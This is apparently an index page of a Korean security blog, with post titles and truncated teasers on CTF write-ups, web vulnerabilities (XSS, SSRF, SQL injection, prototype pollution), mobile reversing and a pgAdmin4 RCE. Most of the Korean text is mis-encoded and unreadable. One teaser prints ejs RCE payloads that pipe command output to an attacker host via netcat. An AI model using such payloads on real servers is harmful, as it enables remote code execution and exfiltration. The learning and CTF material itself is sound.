CVE-2025-2945์ ๋ํด์ ์์๋ด ์๋ค. What is pgAdmin4 pgAdmin4๋ postgresql์ ์ฝ๊ฒ ๊ด๋ฆฌํ ์ ์๋๋ก ๋์์ฃผ๋ ๋๊ตฌ์ ๋๋ค. pgAdmin4๋ Python, ReactJs, Javascript๋ฅผ ์ฌ์ฉํ์ฌ pgAdmin์ ๋ง๋ค์์ต๋๋ค. Electron์ผ๋ก ๋ง๋ค์ด์ง Desktop ๋ฐํ์์ ํตํด ๊ฐ๋ณ ์ฌ์ฉ์๊ฐ...
CVE-2025-2945 - pgAdmin4 for RCE
25๋ ์ ์๊ธ์ต๊ธฐ๋ฐ์์ค ์ฃผ์ ๊ฐ์ ์ฌํญ(์น/๋ชจ๋ฐ์ผ)
25๋ ์น/๋ชจ๋ฐ์ผ ์ ์๊ธ์ต๊ธฐ๋ฐ์์ค ์ทจ์ฝ์ ๋ถ์ ํ๊ฐ์ ์ฃผ์ ๊ฐ์ ์ฌํญ์ ์์๋ด ์๋ค. ๋ฌด์ ํ ์์ฒญ ํ์ฉ AS-IS : ์๋ํ ๊ณต๊ฒฉ TO-BE : ๋ฌด์ ํ ์์ฒญ ํ์ฉ ํญ๋ชฉ ์ด๋ฆ์ ๋ฐ๋ฅธ ๋ด์ฉ ํผ์ ๋ฐฉ์ง๋ฅผ ์ํด ๋ณ๊ฒฝ๋์๋ค. ์ทจ์ฝ์ ์ค๋ช ์์คํ ์์ ๊ณ ๊ฐ, ๋น์ฉ ๋ฐ์ ๋ฑ ์๋น์ค ์ด์์์ ์ํฅ์ ๋ฏธ์น๋ ๊ธฐ๋ฅ์ ๋ํด ๋ฐ๋ณต๋ ํธ์ถ ๊ธฐ๋ฅ ์ฌ๋ถ๋ฅผ ์ ๊ฒ ํ๋ค....
Front-End Security
ํฐ์ค๋ฆฌ์ OpenTRS : Securing the Front Lines: Protecting Front-End Applications from Overlooked Vulnerabilities ๋ฅผ ๋ณด๊ณ ์์ฝํด ๋ณด์. Theori OpenTRS : Securing the Front Lines OpenTRS๋ฅผ ๋ณด๊ณ ๋ด์ฉ์ ์์ฝํด๋ณด๊ฒ ์ต๋๋ค. Why...
Between security and usability
๋ณด์๊ณผ ํธ์์ฑ์ ๋ํ ๋์ ์๊ฐ Background ์ด ๊ธ์ ์ฐ๋ ์ด์ ๋ ๋ณด์ ์ ๋ฌด๋ฅผ ํ๋ฉด์ ์๊ธด ๋ง์ ๊ณ ๋ฏผ๋ค์ด ์์ต๋๋ค. ๊ทธ ์ค ํ๊ฐ์ง๋ ๋ณด์ VS ํธ์์ฑ ์ด๋๊น์ง ํ์ฉ๋์ด์ผ ํ๋๊ฐ ์ ๋๋ค. Generative AI ๊ฐ์ฅ ๋ํ์ ์ธ ์์๋ก ์์ฑํ AI๋ค. ์์ฆ GPT๋ฅผ ์์ฐ๋ ์ฌ๋์ ์์๊บผ๋ผ๊ณ ์๊ฐํ๋ค. ํ์ง๋ง ์ ๋ฌด๋ฅผ ๋ณด์กฐํ๋๋ฐ ์ฌ์ฉํ๊ธฐ...
postgresql with Command Execution
postgresql ์ ๊ทผ์ด ๊ฐ๋ฅํ๋ฉด RCE๊ฐ ๊ฐ๋ฅํ ์๋ ์์ต๋๋ค. What is Postgresql postgresql์ ์คํ์์ค ๊ด๊ณํ ๋ฐ์ดํฐ๋ฒ ์ด์ค ๊ด๋ฆฌ ์์คํ (RDBMS)์ ๋๋ค. ๋ฌด๋ฃ๋ก ์ฌ์ฉ์ด ๊ฐ๋ฅํ๋ฉฐ, ์์ ์ฑ๊ณผ ํ์ฅ์ฑ์ด ์ข์ ํ๊ฐ๋ฅผ ๋ฐ๊ณ ์๋ค๊ณ ๊ณต์ํํ์ด์ง์์ ์๊ฐ๋ฅผ ํ๊ณ ์์ต๋๋ค. How to Command Execution wi...
New Beginning
๊ทธ๋์ ๋ฐ์๋ค๋ ํ๊ณ๋ก ๋ฏธ๋ฃจ์๋ ๋ธ๋ก๊ทธ ๊ธ์ ๋ค์ ํ๋ฒ ์จ๋ณผ๊น ํฉ๋๋ค. 6 months 6๊ฐ์ ๊ฐ ๋ง์ ๋ณํ๊ฐ ์์๊ณ ๊ฐ๋จํ๊ฒ ์ ์ด๋ณผ๊น ํฉ๋๋ค. git & Copilot vscode๋ก ์ฌ์ฉํ๋ git๊ณผ ์ฝํ์ผ๋ฟ์ ์ ์ฉํ๊ณ ํธ๋ฆฌํ๊ฒ ์ ์ฌ์ฉํ๊ณ ์์ต๋๋ค. #Thanks BH ์ฝํ์ผ๋ฟ์ ์ 12$ ...
Take a careful look at the code
Hack The Box๋ฅผ ๋ฌธ์ ๋ฅผ ํ๋ ์ค ๋ณ๊ฑฐ ์๋์์ง๋ง ๊ฝค ๊ณ ์ ํ ๋ถ๋ถ์ ๋ํด์ ์ ์ผ๋ ค๊ณ ํฉ๋๋ค. What happening? admin๊ณ์ ์ผ๋ก ๋ก๊ทธ์ธ์ ํ๋ฉด FLAG๋ฅผ ์ฃผ๋ ๋จ์ํ ๋ฌธ์ ์์ต๋๋ค. ๊ณ์ ์ JWT ํ ํฐ์ผ๋ก ๊ด๋ฆฌ๋์ด ์์ด None Attack๋ฑ ๊ณผ ๊ฐ์ ๊ณต๊ฒฉ์ ๋ถ๊ฐํ์ต๋๋ค. ์๋์ ์ฝ๋์ฒ๋ผ ํ๋ผ๋ฏธํฐ(id,pw)์ ๊ฐ์๊ฐ 2...
Hack The Box - headless
Hack The Box - Headless ๋ฌธ์ ๋ฅผ ํ์ด ๋ด ์๋ค. Port Scanning Port Scanning ๊ฒฐ๊ณผ๋ 22๋ฒ(SSH)์ 5000๋ฒ ํฌํธ๊ฐ ์ด๋ ค์์ต๋๋ค. XSS 5000๋ฒ ํฌํธ๋ก ์ ๊ทผ ์ ์น ํ์ด์ง๊ฐ ๋ณด์ ๋๋ค. For questions ๋ฒํผ์ ๋๋ฅด๋ฉด ์ด๋ฆ, ํฐ๋ฒํธ, contents๋ฑ์ ์ ์ด Submit์ ํ ์...
Boom Boom Hell - Unintened Solve
2024 Line CTF์์ ์น ๋ฌธ์ ์ธ Boom Boom Hell์ ์ธ์ธํ ํ์ฌ ํ์ด๋ฅผ ์ ์ด๋ณด๊ณ ์ ํฉ๋๋ค. Boom Boom Hell ์ค์ ์ฝ๋์ ํด์์ ์๋์ ๊ฐ์ต๋๋ค. /chall ์๋ํฌ์ธํธ์ url ํ๋ผ๋ฏธํฐ๋ฅผ ์ ์ดํ ์ ์์ต๋๋ค. if๋ฌธ 2๊ฐ๋ฅผ ํต๊ณผํด์ผ ํฉ๋๋ค. url์ ํ๋ผ๋ฏธํฐ์ ๊ธธ์ด๊ฐ escapeHTM...
Nginx off by slash
Nginx์ off by slash๋ก ์ธํ ๋ณด์์ค์ ์ผ๋ก ๋ฐ์ํ ์ ์๋ ์ทจ์ฝ์ ์ ๋ํด ์์๋ด ์๋ค. off by slash off by slash๋ /๋ก ๋ซ์ง ์๋ ๊ฒ์ ์๋ฏธํฉ๋๋ค. nginx์ ์ค์ ํ์ผ์ /๋ฅผ ๋ซ์ง ์์์ ๋ ์ด๋ค ์ทจ์ฝ์ ์ด ๋ฐ์ํ ์ ์๋์ง ์์ ๋ฅผ ํตํด ์์๋ด ์๋ค. Alias LFI Misconfiguration ngi...
XSS with srcdoc
HTML5 ํ๊ทธ๋ฅผ ํตํด Real World์์ ๋ฐ์ํ XSS ์ทจ์ฝ์ ์ ์์๋ด ์๋ค. srcdoc <iframe> ํ๊ทธ์ srcdoc ์์ฑ์ <iframe> ์์์ ๋ณด์ผ ์น ํ์ด์ง์ HTML ์ฝ๋๋ฅผ ๋ช ์ํฉ๋๋ค. srcdoc ์์ฑ์ด ๋ช ์๋์ด ์๊ณ ํด๋น ๋ธ๋ผ์ฐ์ ๊ฐ srcdoc ์์ฑ์ ์ง์ํ๋ฉด, <iframe> ...
PHAR Deserialization Vulnerability
์ต๊ทผ์ ๋๋ฆผํต ๋ฌธ์ ๋ฅผ Phar Deserialization ์ทจ์ฝ์ ์ ์๊ฒ๋์ด์ ์ ๋ฆฌํ๊ณ ์ ํฉ๋๋ค. What is PHAR & Deserialization PHAR What is phar? Phar archives are best characterized as a convenient way to group several files i...
HTTP 0.9, 1.0, 1.1, 2.0
์ต๊ทผ์ ์๊ฒ์ ๋ฌธ์ ๋ฅผ ํ๋ค๊ฐ HTTP ๋ฒ์ ์ฐจ์ด๋ก ์ธํ ๋ฌธ์ ๋ฅผ ํ์์ต๋๋ค. ์ด์ HTTP1.0, HTTP1.1, HTTP2.0์ ๋ํ์ฌ ๊ฐ๋จํ๊ฒ ์์๋ด ์๋ค. What is HTTP? HTTP(HyperText Transfer Protocol)๋ ์ธํฐ๋ท ์์์ ์ ๋ณด๋ฅผ ์ฃผ๊ณ ๋ฐ์ ์ ์๋ ํ๋กํ ์ฝ์ ๋๋ค. ์ ๋ขฐ์ฑ์๋ ์ฐ๊ฒฐ์ ํ๊ธฐ ์ํด ์ฃผ๋ก T...
cURL with CTF
CTF๋ ์๊ฒ์ ๋ฌธ์ ๋ฅผ ํ ๋ ์ ๋ช ๋ น์ด๋ก /flag๋ฅผ ์คํ์ํค๊ฑฐ๋, /flag.txt์ ๊ฐ์ ํ์ผ ๋ด์ฉ์ ๊ฐ์ ธ์์ผ ํ๋ ๊ฒฝ์ฐ๊ฐ ์์ต๋๋ค. ์ด๋ฐ ์ํฉ์์ ์์ ์ฐ๊ฒฐํ์ง ์๊ณ cURL๋ฅผ ์ด์ฉํ๋ ์ฌ๋ฌ๊ฐ์ง ๋ฐฉ๋ฒ์ ์์๋ด ์๋ค. What is Curl?? cURL์ client URL ์ด๋ผ๋ ๋ป์ ๊ฐ์ง๊ณ ์์ต๋๋ค. ์ง์ํ๋ ํ๋กํ ์ฝ์ ์ด์ฉํ์ฌ URL...
Base64 Principle
๋๋ฆผํต ๋ฌธ์ like64 ๋ฌธ์ ๋ฅผ ํ๋ค ๊ถ๊ธํ๋ ๋ถ๋ถ์ ์์๋ด ์๋ค. Base64 encoding & Decoding ์๋ฆฌ๋ฅผ ์์๋ด ์๋ค. What is Base64 Base64๋ ascii ์์ญ์ ๋ฌธ์๋ค๋ก ์ด๋ฃจ์ด์ง ๋ฌธ์์ด๋ก ๋ณํํ๋ ์ธ์ฝ๋ฉ ๊ธฐ์ ์ ๋๋ค. ์ ์ฒด์ ascii ์์ญ์ ์๋๋ฉฐ 2^6 -> 64๊ธ์๋ฅผ ๊ฐ์ง๊ณ ์ธ์ฝ๋ฉ์ ํ๋ ...
CSP Bypass with JSONP
CSP์ script-src์ JSONP API๋ฅผ ์ง์ํ๋ ์๋ฒ๊ฐ ์์ ๊ฒฝ์ฐ ์ด๋ฅผ ์ด์ฉํ์ฌ XSS๋ฅผ ํ๋ ๋ฐฉ๋ฒ์ ์์๋ด ์๋ค. What is JSONP JSONP๋ SOP(Same Origin Policy)์ ์ฑ ์ ์ฐํํ๊ธฐ ์ํด ์ฌ์ฉํ๋ ๋ฐฉ๋ฒ์ ๋๋ค. JSONP๋ HTML ๋ฌธ์์ script ํ๊ทธ๋ก ๋ค๋ฅธ ๋๋ฉ์ธ์ ์์ฒญ ํ ์ SOP ์ ์ฑ ์ด ์ ์ฉ๋์ง...
URL Normalization with XSS
URL Normalization์ ๋ํด์ ์์๋ด ์๋ค. ์ถ๊ฐ๋ก URI Normalization์ผ๋ก ์ธํ javascript scheme ํํฐ๋ง ์ฐํ XSS Payload๋ฅผ ์์๋ด ์๋ค. ๋ง์ง๋ง์ผ๋ก๋ filename_XSS์์ ๊ถ๊ธํ ์ ์ ์ฐพ์๋ณด์์ต๋๋ค. URL Normalization ๋ธ๋ผ์ฐ์ ๋ URL์ ์ฌ์ฉํ ๋ Normalization์ ํฉ๋...
AWS Instance Meta-data SSRF
AWS-SSRF๋ฅผ ์ฝ๊ณ ์ค์ตํด๋ด ์๋ค. RCE ๊น์ง ์ํด๋ดค๊ณ SSRF ๊น์ง๋ง ๋ฐ๋ผ ํด๋ดค์ต๋๋ค. Get AWS EC2 Meta-data AWS์ EC2 Instance Meta-data๋ ์คํ ์ค์ธ Instance๋ฅผ ๊ตฌ์ฑ ๋๋ ๊ด๋ฆฌํ๋ ๋ฐ ์ฌ์ฉ๋ ์ ์๋ Instance ๊ด๋ จ ๋ฐ์ดํฐ์ ๋๋ค. ๋๋ถ๋ถ์ AWS EC2 Instance Meta-da...
๐ตโช๏ธ๐ด ๊ฐ๋ฑ ์คํ....
๐ตโช๏ธ๐ด ์น๊ตฌ๋ค๊ณผ ์ ๋ํผ๋ ์ฌ๊ณ ์์๊ฐ๋ ๋ถ๋ฅด๋ฉฐ ์ข์ ์ถ์ต์ ๋ง์ด ๋ง๋ค๋ฉฐ K๋ฆฌ๊ทธ์ ๋น ์ง๊ฒ ๋์์ต๋๋ค. ์์์ผ์ฑ์ ์์ํ๋ ํฌ์ผ๋ก์ ์ด๋ฒ์ฃผ ํ ์์ผ์ ์ฐธ์ผ๋ก ๋ง์์ด ์ํ ํ๋ฃจ์์ต๋๋ค. 12์๋ก ์์๋ฅผ ๋ง๋ฌด๋ฆฌ ํ๋ฉฐ ๊ฒฐ๊ตญ ๋ค์ด๋ ํธ ๊ฐ๋ฑ์ ํ๊ฒ๋์์ต๋๋ค. 2๋ถ๋ฅผ ๊ฐ๋๋ผ๋ ์์์ ์ํ๋ ๊ฒ์ ์๋์ง๋ง ์ฐธ์ผ๋ก ์์ฌ์์ด ๋ง๊ณ ์ํ๊น์ด ํ ํด ์์ต๋๋ค. ๋ช๋ช...
Javascript Asynchronous
javascript์์ ๋น๋๊ธฐ์ฒ๋ฆฌ ๋ฐฉ๋ฒ์ ์์๋ด ์๋ค. javascript is synchronous ์๋ฐ์คํฌ๋ฆฝํธ๋ hositing๋ ์ดํ๋ถํฐ ์ฝ๋๊ฐ ํ๋์ฉ ์ฒ๋ฆฌ๋ฉ๋๋ค. hositing์ด๋ var, function declartion๋ฑ ์๋์ ์ผ๋ก ์๋ก ์ฌ๋ผ๊ฐ๋ ๊ฒ ๊ทธ๋ ๊ธฐ ๋๋ฌธ์ ์๋ฐ์คํฌ๋ฆฝํธ๋ ๋น๋๊ธฐ์ฒ๋ฆฌ๋ฅผ ์ํด callback, pr...
ejs RCE Payload
ejs์์ ์ฌ์ฉ ๊ฐ๋ฅํ RCE payload ์ ๋๋ค. Payload mainModule "process.mainModule.constructor._load('child_process').exec('{CMD}+|+nc+{attackerip}+{port})" mainModule "process.mainModule.require('chil...
Prototype Pollution
Prototype Pollution์ ๋ํด์ ์์๋ด ์๋ค. Background Javascript์ ๊ฐ์ฒด ์งํฅ Javascript๋ ๊ฐ์ฒด ์งํฅ ์ธ์ด ๊ฐ์ฒด์งํฅ์ธ์ด์ class ๊ฐ๋ ์ด javascript์๋ ์กด์ฌํ์ง ์์ โ ์์ ๊ธฐ๋ฅ์ ์ฌ์ฉํ์ง ๋ชปํ๋ค๋ ์๋ฏธ prototype์ด๋ผ๋ ๊ณ ์ ํน์ฑ์ ์ด์ฉํด ์์ ๊ธฐ๋ฅ์ ๊ตฌํ EC...
Response Status Code(307, 308) with POST DATA
์๊ฒ์์ ๊ณต๋ถํ๋ค๊ฐ ์์๋ธ POST ๋ฐ์ดํฐ๋ฅผ ํ์ทจ ํ ์ ์๋ ๋ฐฉ๋ฒ์ ์์๋ด ์๋ค. Redirection Status Code HTTP ์ํ์ฝ๋์์ ๋ฆฌ๋ค์ด๋ ์ ์ฝ๋๋ ์ผ๋ฐ์ ์ผ๋ก (300๋ฒ๋)์ ๋๋ค. ์ด์ค์์ 301, 302, 307, 308์ ๋ํด ๊ฐ๋ตํ๊ฒ ์์๋ด ์๋ค. 301 Moved Permanently : ์์ฒญํ ๋ฆฌ์์ค์ UR...
SS-Leak with Code Injection
SS-Leak ๊ณต๊ฒฉ์ ๋ํด ์์๋ด ์๋ค. Information Same-Site ์ค์ ์ผ๋ก ์ธํด XS-Leak ๊ณต๊ฒฉ์ ์๋ํ๊ธฐ ์ด๋ ต์ต๋๋ค. XS-Search์ ๊ณต๊ฒฉํ๋ ค๋ฉด inline-script๋ฅผ ์ด์ฉํด์ผํ๋ ๊ฒฝ์ฐ๊ฐ ๋ง์ง๋ง CSP ์ค์ ์ ์ํด์ ๋ถ๊ฐ๋ฅ ํ ๊ฒฝ์ฐ๊ฐ ์์ต๋๋ค. Example Code ์์ ์ฝ๋๋ฅผ ๋ณด๋ฉด CSP๊ฐ ์ค์ ๋์ด ์์ด i...
XS-Search
Dreamhack ๊ฐ์๋ฅผ ํตํด XS-Search ๊ณต๊ฒฉ์ ๋ํด ์์๋ด ์๋ค. Differences XSS ์น ๋ธ๋ผ์ฐ์ ์์ SOP(Same-Origin Policy)์ ์ฑ ์ผ๋ก ์ธํ์ฌ ์ผ๋ฐ์ ์ผ๋ก๋ ๋ค๋ฅธ ์ค๋ฆฌ์ง์ ์์ฒญ์ ๋ณด๋ด๊ณ ์๋ต์ ๋ฐ๋ ๊ฒ์ ๋ถ๊ฐ๋ฅํฉ๋๋ค. XSS๋ ๊ณต๊ฒฉ ๋์ ์ค๋ฆฌ์ง์ ๋ฐ๋์ ๊ณต๊ฒฉ์์ ์ ๋ ฅ์ด ๋ค์ด๊ฐ ์คํฌ๋ฆฝํธ๋ฅผ ์ฝ์ ํด์ผํ๊ณ , ...
Privilege elevation by SQL Injection
์๊ฒ์์ ํ๋ค ๋ฐ๊ฒฌํ SQL Injetion์ ํตํ ๊ถํ์์น ๊ณต๊ฒฉ์ ์์๋ด ์๋ค. ์ค๋ฌด์์๋ ๋ฐ๊ฒฌ ๊ฐ๋ฅ์ฑ์ด ์กด์ฌํ๊ธฐ์ ํญ์ ์ด๋ฆฐ ์๊ฐ์ ๊ฐ์ ธ์ผํฉ๋๋ค. Attack Scenario ๊ณ์ ์ ๊ถํ์ DB์ ์ ์ฅ๋์ด ์์ ์ผ๋ฐ ๊ณ์ ์ ์์ฑํ ๋ ์๋์ผ๋ก DB์ ์ผ๋ฐ ๊ถํ์ด ์ถ๊ฐ๋จ ์ฟผ๋ฆฌ ๊ตฌ์กฐ๋ฅผ ํ์ (์ถ์ธก)ํ์ฌ insert ๊ตฌ๋ฌธ์ SQL ...
SQL Injection Filtering Bypass
Mysql์์ SQL Injection Filtering Bypass์ ๋ํด์ ์์๋ด ์๋ค. Whitespace Filtering Bypass ๊ณต๋ฐฑ ๋ฌธ์ ํํฐ๋ง์ %09, %0a, %0b, %0c, %0d, %a0, /**/ ๋ฅผ ์ฌ์ฉํ์ฌ ์ฐํํ ์ ์์ต๋๋ค. ๋ฌธ์์ด ์๋ฏธ ...
Integer Overflow
Dreamhack๋ฅผ ํ๋ค ๋ฐ๊ฒฌํ Integer Overflow์ ๋ํด์ ์์๋ด ์๋ค. Integer Overflow Integer Overflow๋ ์ฃผ์ด์ง ์๋ฆฟ์๋ก ํํํ ์ ์๋ ๋ฒ์(์ต๋๊ฐ๋ณด๋ค ํฌ๊ฑฐ๋ ์ต์ ํํ ๊ฐ๋ฅํ ๊ฐ๋ณด๋ค ๋ฎ์)๋ฅผ ๋ฒ์ด๋๋ ์ซ์ ๊ฐ์ ์์ฑํ๋ ค๊ณ ์๋ํ ๋ ๋ฐ์ํ ์ ์๋ ๋ฌธ์ ์ ๋๋ค. Exam ์๋์ ์์ ์ฝ๋๋ฅผ ๋ณด๋ฉด...
Rootbeer bypass
Rootbeer๋ผ๋ ๋ฃจํ ํ์ง ์ฑ์์ ๊ฑธ๋ฆฐ ๋ฃจํ ๋ก์ง์ ์ฐํํด์ bypass ํ๋๋ก ๋ง๋ค์ด๋ด ์๋ค.. Rooting Detect ์ฑ์ ์คํ ํ ๋ฃจํ ์ฒดํฌ๋ฅผ ํ๊ฒ ๋๋ฉด ์๋์ ๊ฐ์ด 12๊ฐ์ ์ฒดํฌ ๋ก์ง์์ 7๊ฐ์ ๋ก์ง์ด ๋ฃจํ ์ ๊ฑธ๋ ธ์ต๋๋ค. ๊ณต๋ถ๋ฅผ ์ํด ๋ถ์ํ์ฌ ์ฐํํด ๋ด ์๋ค. Root Management Apps && Pot...
Vanitas - CVE-2018-13379
whitehat contest 2023์์ ์ถ์ ๋ ์น Vanitas์์ ๋์จ ์ทจ์ฝ์ ์ ์์๋ด ์๋ค. ํ์ผ์ ์ฝ์ด์ ๊ณ์ ์ ๋ณด๋ฅผ ๊ฐ์ ธ์ค๋ CVE-2018-13379 ๋ถ๋ถ๋ง ์ง์ ๊ตฌํ ๋น์ทํ๊ฒ ํ์ต๋๋ค. ๋ฌธ์ ์์๋ ์น์๋ฒ ํ์ผ์ด ELF๋ก ๋์ด์์ง๋ง ๊ฐ๋จํ๊ฒ exe ํ์ผ๋ก ๋ง๋ค์์ต๋๋ค. ๋ฌธ์ ์ฝ๋ ๋ฌธ์ ๋ ์๋์ ๊ฐ์ด ๊ตฌ์ฑ๋์ด ์์ต๋๋ค. unpa...
uncrackable level 1
์ค๋๋ง์ ๋ชจ๋ฐ์ผ ํํน์ ๋ณต๊ธฐ ํ๊ธฐ ์ํด uncrackable 1 ํ์ด๋ฅผ ํด๋ด ์๋ค. Uncrackable 1 These are the UnCrackable Apps for Android and iOS, a collection of mobile reverse engineering challenges. These challenges are us...
Diff View with Ghidra
Ghidra๋ ๋ ๊ฐ์ ์๋ก ๋ค๋ฅธ ๋ฐ์ด๋๋ฆฌ์ ์ฐ์ฐ์๋ฅผ ํ์ํด์ฃผ๊ณ ํตํฉํ๋ ๊ธฐ๋ฅ์ด ์กด์ฌํฉ๋๋ค. ์ด๋ฒ์๋ Diff View๋ฅผ ์ด์ฉํ์ฌ ๋ฐ์ด๋๋ฆฌ์ ์ฐจ์ด์ ์ ์ฝ๊ฒ ๋ณด๋ ๋ฐฉ๋ฒ์ ์์๋ด ์๋ค. Program Difference Ghidra๋ ์๋ก ๋ค๋ฅธ ๋ฐ์ด๋๋ฆฌ์ ์ฐ์ฐ์๋ฅผ ํ์ํ๊ณ ์ฐ์ฐ์๋ฅผ ํตํฉํ๋ Program Difference๊ฐ ์กด์ฌํฉ๋๋ค. git...
IPA Data Decryption
์ ํ์คํ ์ด์์ ์ฑ์ ๋ค์ด๋ฐ์ผ๋ฉด ida๋ก ๋ถ์์ ํด๋ณด๋ฉด ์ํธํ ๋์ด์ ๋ถ์์ด ๋ถ๊ฐ๋ฅํฉ๋๋ค. ๋ณตํธํํ๋ ๋๊ตฌ๋ค๋ ๋ง์ง๋ง ์๋์ผ๋ก ๋ณตํธํ ํ๋ ๋ฐฉ๋ฒ์ ์์๋ด ์๋ค. Letโs go Step 1 ipa to local PC AppStore์์ ๋ค์ด๋ฐ์ ipa ํ์ผ์ ๋ก์ปฌ PC๋ก ์ฎ๊น๋๋ค. ida์์ ipaํ์ผ์ ์ด์ด๋ณด๋ฉด ์ํธํ ๋ฉ์์ง ํ์ธ์ด ๊ฐ๋ฅ...
EX - CSS Injection
CSS Injection ์ค์ต์ ํด๋ด ์๋ค.. Code Code๋ app.py, index.html ์ฝ๋๊ฐ ์กด์ฌํฉ๋๋ค. ์ฝ๋๋ ๋จ์ํ color ๋ณ์๋ฅผ ๋ฐ์ index.html์ h1 ํ๊ทธ์ ์์์ ๋ณ๊ฒฝํฉ๋๋ค. index.html์๋ input์ผ๋ก api_key๊ฐ ์กด์ฌํฉ๋๋ค. from flask import Flask, render_te...
CSS Injection
Dreamhack ๊ฐ์๋ฅผ ํตํด CSS Injection์ด ๋ฌด์์ธ์ง ์์๋ด ์๋ค. CSS Injection CSS Injection์ XSS์ ๋น์ทํ๊ฒ ์น ํ์ด์ง ๋ก๋ฉ ์ ์ ์์ ์ธ ๋ฌธ์์ด์ ์ฝ์ ํ์ฌ ์ ์์ ์ธ ๋์์ ์ด๋๋ ๊ณต๊ฒฉ์ ๋๋ค. ๊ณต๊ฒฉ์๊ฐ ์์ CSS ์์ฑ์ ์ฝ์ ํด ์น ํ์ด์ง UI๋ฅผ ๋ณ์กฐ ํ๊ฑฐ๋ CSS ์์ฑ์ ๋ค์ํ ๊ธฐ๋ฅ์ ํตํด ์น ํ์ด์ง...
php filter chain RCE
์๊ฒ์ ๋ฌธ์ ๋ฅผ ํ๋ค๊ฐ ๋ฐ๊ฒฌํ PHP Filter chain ๊ณต๊ฒฉ์ผ๋ก RCE๋ฅผ ํ๋ ๋ฐฉ๋ฒ์ ์์๋ด ์๋ค. What is php filter? php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of o...
XSS with Fileupload Name
ํ์ผ ์ ๋ก๋ ํ ๋ค์ด๋ก๋ ๋ฐ์ ๋ <a>๋ฅผ ์ฌ์ฉํ์ฌ javascript๋ฅผ ํตํด ํ์ผ ์ด๋ฆ๋ช ์ผ๋ก ๋ค์ด๋ก๋ ๋ฐ์ ์ URL Encoding์ ํ์ฌ XSS ์ทจ์ฝ์ ์ด ๋ฐ์ํ ์ ์์ต๋๋ค. Source Code ๋จผ์ flask ๊ธฐ๋ฐ์ผ๋ก ๋ง๋ค์ด์ง ์์ค ์ฝ๋๋ฅผ ์์ ๋ด ์๋ค. upload ๊ธฐ๋ฅ๊ณผ download ๊ธฐ๋ฅ์ด ์กด์ฌํฉ๋๋ค. fro...
Cookie Security
๋๋ฆผํต ๊ฐ์๋ฅผ ํตํด Cookie์ ๋ณด์์ค์ ์ ์์๋ด ์๋ค. Cookie Domain/Path ์๋์ ๊ฐ์ด Cookie๊ฐ ์ค์ ๋์์ ๋ ์ด๋ป๊ฒ ๋๋์ง ์์๋ด ์๋ค. Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>; Path=<cookie-...
Unicode Lower Case & Decomposition
์๊ฒ์ ๋ฌธ์ ๋ฅผ ํ๋ค๊ฐ ๋ฌธ์์ด์ ๊ฒ์ฆ ๋ก์ง ์ฐํ์ ๊ด๋ จํ ์ฌ๋ฏธ์๋ ํธ๋ฆญ์ด ์์ด ๊ธ์ ๋จ๊น๋๋ค. What is Unicode ์ ๋์ฝ๋(Unicode)๋ ์ ์ธ๊ณ์ ๋ชจ๋ ๋ฌธ์๋ฅผ ์ปดํจํฐ์์ ์ผ๊ด๋๊ฒ ํํํ๊ณ ๋ค๋ฃฐ ์ ์๋๋ก ์ค๊ณ๋ __๊ตญ์ ํ์ค ๋ฌธ์ ์ธ์ฝ๋ฉ ์์คํ __์ ๋๋ค. Unicode์ ์ฃผ์ ํน์ง ๋ฒ์ : 0~0x10FFFF ๊น์ง์ 1...
CRLF Injection & HTTP Response Splitting
์ต๊ทผ CTF ๋ฌธ์ ๋ฅผ ํ๋ค๊ฐ CRLF Injection์ ํตํด HTTP Response Splitting์ผ๋ก flag๋ฅผ ์ฐพ๋ ๋ฌธ์ ๊ฐ ์์์ต๋๋ค. ๊ฐ๋ ์ดํด๊ฐ ๋ถ์กฑํ๊ฑฐ ๊ฐ์ ๊ธ๋ก ์์ฑํ๋ ค๊ณ ํฉ๋๋ค. CRLF Injection CRLF Injection์ Carriage Return๊ณผ Line Feed๋ฅผ Inject ํ๋ ๊ณต๊ฒฉ์ ๋๋ค. Carr...
ICMP Tunneling by Python with Scapy v2
ICMP ํฐ๋๋ง ์๋ฒ์์ ์๋ํ๋ก ๋ฐ๋ ๋ฐฉ๋ฒ์ผ๋ก ์ ๋ฐ์ดํธ๋ฅผ ์งํํ์ต๋๋ค. ์ด์ ์ ๋ด์ฉ์ ICMP Tunneling 1ํธ์ ์ฐธ๊ณ ๋ถํ๋๋ฆฝ๋๋ค. ๋ชฉ์ ๋ด๋ถ๋ง์์ ๋ ผ๋ฆฌ์ ๋ง๋ถ๋ฆฌ๊ฐ ๋์ด์์ด๋ ๋ HOST๊ฐ ping์ด ๊ฐ๋ฅํ ๋ ICMP Tunneling์ผ๋ก ๋ฐ์ดํฐ ์ ์ก์ ํ ์ ์์ต๋๋ค. Send HOST์ Recieve HOST์์ ํ์ด์ฌ ...
URL Check Automation
์ ๋ฌด๋ฅผ ํ๋ฉด์ ์์ฐ๋ง๋ค ์ ๊ทผ ๋๋์ง ํ์ธ์ ํ๊ธฐ ์ํ ์์ ์ ์์ด ์ด๋ฅผ ์๋ํ ํ๋ ์ฝ๋๋ฅผ ๋ง๋ค์์ต๋๋ค. ๊ตฌ์กฐ ๊ทธ๋ฆผ์ผ๋ก ๊ทธ๋ ค๋ณธ ๋์ํ์ ๋๋ค. ์์ ํ์ผ์์ URL๊ณผ URL ์๋น์ค ์ด๋ฆ์ ์ฝ์ด์ต๋๋ค. ์ฝ์ด์จ ๋ฐ์ดํฐ๋ฅผ URL ์๋น์ค๋ฅผ ๋์ ๋๋ฆฌ์ ํค, URL์ ๋์ ๋๋ฆฌ์ ๊ฐ์ผ๋ก ์ ์ฅํฉ๋๋ค. URL Request & Reply...
๊ธฐ๋๋ผ Ghidra ์ค์ ๊ฐ์ด๋
